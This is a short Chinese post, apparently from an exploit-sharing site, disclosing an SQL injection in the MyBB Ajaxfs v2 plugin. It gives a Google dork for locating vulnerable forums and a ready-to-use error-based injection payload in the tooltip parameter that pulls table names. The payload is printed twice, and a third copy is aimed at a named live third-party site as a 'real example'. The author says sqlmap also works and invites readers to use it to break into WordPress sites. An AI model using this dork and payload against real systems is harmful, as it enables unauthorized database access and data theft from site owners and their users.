MyBB Ajaxfs v2 插件注射

  • A+
所属分类:漏洞时代
摘要

Author:CX.Strom
这是国外开源论坛10大模板之一。
google:inurl:ajaxfs.php?tooltip=
EXP
[php]
http://www.0day5.com/forum/ajaxfs.php?tooltip=211′ and(select 1 from(select count(*),concat((select (select (select table_name from information_schema.tables where table_schema=database() limit 72,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘2’=’1[/php]

Author:CX.Strom
这是国外开源论坛10大模板之一。
google:inurl:ajaxfs.php?tooltip=
EXP
[php]
http://www.0day5.com/forum/ajaxfs.php?tooltip=211' and(select 1 from(select count(*),concat((select (select (select table_name from information_schema.tables where table_schema=database() limit 72,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '2'='1[/php]

实例:
http://www.3enterfa.com/forum/ajaxfs.php?tooltip=211' and(select 1 from(select count(*),concat((select (select (select table_name from information_schema.tables where table_schema=database() limit 72,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '2'='1
这样就可以了,我就不往下注射了,大牛们都懂的。sqlmap也是可以跑出来的。
影响网站不是太多,
不过我看国外有不少wordpress和这个模板搭配。
大牛们以后日wordpress又多了一种方法呢~!
小菜文章,大牛脚下留情!

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: